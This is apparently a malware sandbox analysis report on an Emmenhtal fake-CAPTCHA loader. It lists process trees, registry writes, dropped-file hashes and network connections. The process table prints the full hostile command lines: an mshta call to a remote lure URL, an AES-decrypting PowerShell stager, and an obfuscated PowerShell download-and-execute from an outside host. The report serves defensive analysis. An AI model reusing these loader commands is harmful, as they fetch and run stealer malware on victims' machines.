| download: | /awjxs.captcha |
| Full analysis: | https://app.any.run/tasks/46a0d57e-9894-460a-b673-fafaf7d788d7 |
| Verdict: | Malicious activity |
| Threats: | First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments. |
| Analysis date: | December 19, 2024, 17:49:30 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (65536), with no line terminators |
| MD5: | 4DE615159C5AF82DE1EDA852CA020826 |
| SHA1: | 6C900EEC4B7075BAB238D118BCCF2103AD168549 |
| SHA256: | 48BF4DA489D2DF537816870E372D8739737CEE0E60FCD0E613F37DDD1557F039 |
| SSDEEP: | 49152:iFBHeBHABHCBHgBywBHPBHUMH5BHaBHsBHEBHOBHJRHC:KIGwKJ5yG4Gy83A |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 4120 | C:\windows\system32\mshta.exe https://solve.jenj.org/awjxs.captcha?u=c7f3f5bc-a96e-4113-8095-768e0ea288ca # "I am not a robot -reCAPTCHA Verification ID:3747" | C:\Windows\System32\mshta.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4264 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4764 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HkeaB($HHTx){return -split ($HHTx -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$eTOlw = HkeaB('56C0925A401107AA9864A339BBFBDF84456FD36DFD5EEB5921D1BDD5E3AA3602798BA99963192AC6F93F7F397779C8AF1735BD1AA59DAAE793BA42E01142AA46E2AB2AA78B10EC57070CDBBA7BFB41C2FF7FA945D2BB2624F4FFC2B4E929BF255274783A8E519957C7523E8D5F4980492E77D4366B50DA922C80EF69B58F5D27FF301FEF0A02743CC7BD0611806D10469C2DB37646693954D987C81A7FA4B70A8A56CDC2781563D7CE1D58EA985C23CD25FF74DBF80059B9A05320C939D37EB7A513EB32BFD0CD070198DCB72A2FADA7960D8BEF8EDCC10EB2BE3B152F8E05755AF5E174DCF815C5A2B2BC22E89276130DF8EAB9F2181466151BDCBE2D171427BA20754768217CE1ED3093129C2355821B2DB90E55464B6A574482FC83154DCE9426A3AC9257EE33649B004AD18C1524F848ED8992D5A94BE4BCA63698F4B44AC38C57041B7175013280FD4B0220B38BA6D281E47A5E69B61F997947D1C498ABB362D9B79578789206143B42D30E54BAE312CAD3192E98C9DE1E9FC6F0E7DC63AC3252752423D08B416636CB66F29BD348C215773442EBB2F8CE9D7E06FF0C2C6FA3BD104423EE3673C06372B92368264C2D64645BBCD365DAF012FB78385802855A519999B4FDBD4410CD506FEE4D850D0A471F6587C48E81EB710022C447FCC40558D4B2C0F2A296C1585F50C4945CEC6687B39993EFF93E6B3F3908902F3090FF8E41EE74D43C83CF796DBD491977C7821B315590FE2DAB43C97AA8B212FF2ABFD97032AAA8E9D93E7EC83F0CB6E7A7137AB229887E59BEF644F7F2A0C0A663968278C1761339ADEA1345D6985C998013375D19E3D394AC25CA0E3EB1EFFF2A840E85C3BCB6C5E327EFB7089B55F2E55D51B90C584A0D8AAF42BAE51BEC47A7C08C51DC9F6B73552649669833A9AE069B574345D5B949093B6C0358858F271BF693A472B1642EF16EEC9B63DF07DC5E7ABC3B478D706B864DA27E711D0BA593019353C71121ABB43EDA5B324A594B1CA93F2B445DFD4380C90CE2C00507E1A235D32F6E9C9E2D35775749810C2039AE683EC511A5178F4AF0C5F5CB99750F37003FA30EEA348AEC895384BC149463E9AB6259149DA8C9059292A7F3CE7B43E5987DD4A45F438379C7FDBFCBFC1BF764E6BF84191CEBBB1277306CE919F6010BC108BC654C752603D64C21455A6B6309DD903B4FA9177638D2E04B2878941FAD128F20A20817B881BECF8456DC6003592265192A3A6B353B055385FFC4ADAABE9189A5F5417F4735CB3EAED71C460079132E1F6CE9E7F3275D0419375D6857EDC14A308FFA545DDE899DA6E8669B255F97997C9637BFD0B84A7EB21A586D6C81388C984ACA0A24732C809816065B8F16136417C6F5A3C114D91E45D62CE4B5A8E07F2678F61DC1EA32A6C98DCD0EDE17A5BD683AD33B6F864C6C1AB28DE28C4A524B7F11481042153DE72AD5B5C4AD34329E015DEB07784C48A6DD44CBDD5E284CCEB8261F84C7330895CB775D06F444FBC21EE1446FAF2B2264CB85C4F326E71F4E517FBEA633855F19413F4998552F15D43C60F06E9E9A28130F369A5909E0946095B50C205AE3101643DE2FA16CE34626ABAAE461FA00578E25FA8045CEB23DC172D585A3198AC67F897C35EE79DA083A4E9570685CB56BA89760392B825E99DFC730DA56F32E5639A73294C35BC7289E1E110EFB184E54CFF6DD684B5B88E4B3126E248345C7071CBBBFBD522D8595AE3060DE9A9837C813AA18951DB6CED8F559954DF929F31FC439CC18C0C5955E78B3C4C35F2A51688B6E3F1B0DC2A7439C31408D4DF83355C2662BB3AFB6429575FE6AE314AC754C2F1506982FFCE3168504B0185C9A909AF73E44F31DDED37DFC0B1195CDE2240682D8E45DA6BBD86604756240780D58D29B4CA8C3B578BF0A7E93D3C0113AFFCFDBFB64AC4C4459AEB92ED284D6B2743811D877A3BC3A99ED958A6EC44E2F80A786375685A1B40B112B4E59A7DAB59AA513F3B409180A60D7A920C880E6280C172BBDF1B6F7D3E77AF8100819955F84E4B04AD3489352336B46A68F32F6B99D08A059427A862DCA662DBF3665E1150D00102661993BFB7FC2AA277A9ED6C9C53331284560A002A953FEC8D56C21F5B1517339A664F64D1CF71348E148E6FB498EA9E8AEEC3A19FDF3D6EB7075279E8DA92B5675C21AB84A9E09CE89A27A328B7B73745EDCFED290FBB5464495F652D8FE347AF1585087A36131A205E7788920A875EF7396EBC138FE11519C66F7CB5170F6F0AED4F80C57DB6A5791B8E5B5DAACDC66FD51C83360C98C00F7EFE2F2B87F3A664743EEE419A5F4F4AB48C10A11DB328771B4A29C0DDD24142684D9FFEED6DC3A57FC43444059DA5C16C3F276E355B7B0F3F7FC8CA218B2F518CBD96DA39CC0C3A13CE6D314F3A2DBB2FA2BAC8F3A3C2A480976FDB3B8C492788133F4E0BEB98CEE200FA80EAAB711DF07E9B5554B25B8A02FF1FC0449D767E888202E34D715624ABAE2FFE1508CC20BAB0ECA91F1ED090129BC3C329A248336581E3667638A1D4A4B12509380D6B03BF8A91ED3248D729731BD140B8A12E5408459ED9CA34540551DB4A92CF4557CA43E81C16CE78DC574501F8AC99AC4F2B54D1407E313D76CEAACD5DE059380C957201FFA81262A3E690CA0B6583AC416A2C6436CAE4AB200BF05978D69DCCADDB9ADE7E4CC3CFF64276C77BB343FEE5AC4F2BCE7104BB8B7ED86174FFC7632274D033D19681FA8D40DB26B976B8864E8686A2236281C6C9BCFEDD3905F2911DCDDA65BD5F639A442214825BA7CD87F40FA09DCA62C3C2766133DB00BA488D6BFF4C91379E7149E67E655BCD8E335AD1B141CEAB35E7E5F826F12E414ABDCC6EE47E750C2971432B3B897267FD7D4E7C8CBBA36AF880A866319EB0F629B31A69E815B0B702AEB04E5AA2368F86DC47BC8210929F839A3000F913C07E69EDBCA8D2483D49F90C032D8DEC06C47AA5F3B3770A3BCFB02DDB421F8A85E646BEE51A67B0FD5432307FCF390B0DBE383BA0D454A6FD02B0BBDB031E131B929A5E9853D80B08431B572B7C70D6D1EE216D30DF21A9437F87A8A6A9D638612B208B86D7F0D5DA25D896AEFA241B3783D60CCC5BDC32EAE7314ECCC84B8642A351FCCC8112770393858E55F98B614686F37F100019002EEED6B7C1A9E691EC9A258ECE7EF7EC746A253FC3E7E85C5ED7B897A91BBB2290C16239EF9505F07469ADD3590E39FA7441624A2DA9A142B4A4B3F4FB7614EE2E17E0D465DB8BF7A57461C58D266931470A75B2F82283006F0503813009A3A090C643A895D1440BC6CB47909F3A4672A4CB948D51EA3C63EB6426C0E7C3CF856B25BFBD3BC30C55DAE71D57FA1699635E5931A4003E39DB899F1E05A477F80DC175013F950795A352676C803AF69E7227DD35A199C15CD1347D674F736B6B40575245B8D153A683577F5E26A412F7EF61DE443659B882581D201B029795CAD4950F3C795A0C53EF5BE3AE48CAB0DC5C2A32A15F58EB644B62274A5129379B079781E7788890B1993C1AF05D8E4BAABB0374532738C337967D80417856B3AEB660C68A4936753A227B4E095D7F5E6B7190EC61F5B87A8A66707D8A7C141A1E52A7300E942A8B4AD9436F1');$ohnjI=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((HkeaB('505A4642434359487367724355555847')),[byte[]]::new(16)).TransformFinalBlock($eTOlw,0,$eTOlw.Length)); & $ohnjI.Substring(0,3) $ohnjI.Substring(129) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6212 | "C:\Windows\System32\cmd.exe" /k mshta.exe C:\Users\admin\AppData\Local\Temp\awjxs.captcha.txt | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6224 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6284 | mshta.exe C:\Users\admin\AppData\Local\Temp\awjxs.captcha.txt | C:\Windows\System32\mshta.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6748 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6828 | "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://anita2.snuggleam.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6284) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6284) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (6284) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (4120) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4120) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4120) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (6828) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6828) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6828) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6828) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4120 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:54E0B93837075E10532ED7625FEC43BD | SHA256:70B57D4E3A670610F059BD2DBAAB0391EDEADF540556D04DC2F772C5E75E0775 | |||
| 6828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ln3iymsq.wfk.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4120 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary | |
MD5:D98C836A06673B083768E680F31E6621 | SHA256:19B25CDCC9880785368A261C34EFAE18BC3EE6617A5837445AB0A2CFF0CDF6FB | |||
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h00hqqbx.0zd.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4120 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary | |
MD5:67E486B2F148A3FCA863728242B6273E | SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB | |||
| 6828 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wyaq4dqo.jzg.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4120 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:971C514F84BBA0785F80AA1C23EDFD79 | SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895 | |||
| 4764 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:2A4B24840CCAC2CA993E4B58BDBAC281 | SHA256:D55389FFFDFEBE80E4B703D6B904722DB76319D99360E0B7274073AD42CF42BE | |||
| 6828 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:8E7D26D71A1CAF822C338431F0651251 | SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 | |||
| 4120 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\winwidgetshp[1].json | text | |
MD5:4DE615159C5AF82DE1EDA852CA020826 | SHA256:48BF4DA489D2DF537816870E372D8739737CEE0E60FCD0E613F37DDD1557F039 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.32.238.161:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.37.202.100:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.37.202.100:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6152 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | — | — | whitelisted |
7084 | SIHClient.exe | GET | 200 | 23.37.202.100:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7084 | SIHClient.exe | GET | 200 | 23.37.202.100:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
4120 | mshta.exe | GET | 200 | 142.250.184.227:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
4120 | mshta.exe | GET | 200 | 142.250.184.227:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
— | — | 192.168.100.255:137 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.32.238.161:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4712 | MoUsoCoreWorker.exe | 23.37.202.100:80 | www.microsoft.com | Linknet-Fastnet ASN | ID | whitelisted |
— | — | 23.37.202.100:80 | www.microsoft.com | Linknet-Fastnet ASN | ID | whitelisted |
5064 | SearchApp.exe | 2.21.110.146:443 | www.bing.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
2356 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3976 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
Domain | IP | Reputation |
|---|---|---|
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |
arc.msn.com |
| whitelisted |
fd.api.iris.microsoft.com |
| whitelisted |